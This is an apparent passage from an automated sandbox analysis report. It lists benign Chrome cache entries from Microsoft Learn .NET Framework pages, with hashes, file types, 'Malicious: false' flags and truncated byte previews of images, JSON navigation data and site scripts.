SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 103

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	4897
Entropy (8bit):	4.8007377074457604
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:	0E78F790402498FA57E649052DA01218
SHA1:	9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:	B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 104

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:	3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Chrome Cache Entry: 105

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:	downloaded
Size (bytes):	64291
Entropy (8bit):	7.964191793580486
Encrypted:	false
SSDEEP:	1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:	8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:	6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:	false
URL:	https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
Preview:	......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

Chrome Cache Entry: 106

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 107

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/media/logos/logo_net.svg
Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 108

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33273), with no line terminators
Category:	downloaded
Size (bytes):	33273
Entropy (8bit):	4.918756013698695
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:	86E84C732A96BF9CF18C99B48DB90B6D
SHA1:	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:	AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/toc.json
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 110

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	4897
Entropy (8bit):	4.8007377074457604
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:	0E78F790402498FA57E649052DA01218
SHA1:	9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:	B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:	false
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 112

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	downloaded
Size (bytes):	1817143
Entropy (8bit):	5.501007973622959
Encrypted:	false
SSDEEP:	24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:	F57E274AE8E8889C7516D3E53E3EB026
SHA1:	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:	9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/scripts/en-us/index-docs.js
Preview:	"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 114

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:	3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1432
Entropy (8bit):	4.986131881931089
Encrypted:	false
SSDEEP:	24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:	6B8763B76F400DC480450FD69072F215
SHA1:	6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:	8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:	false
Preview:	// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
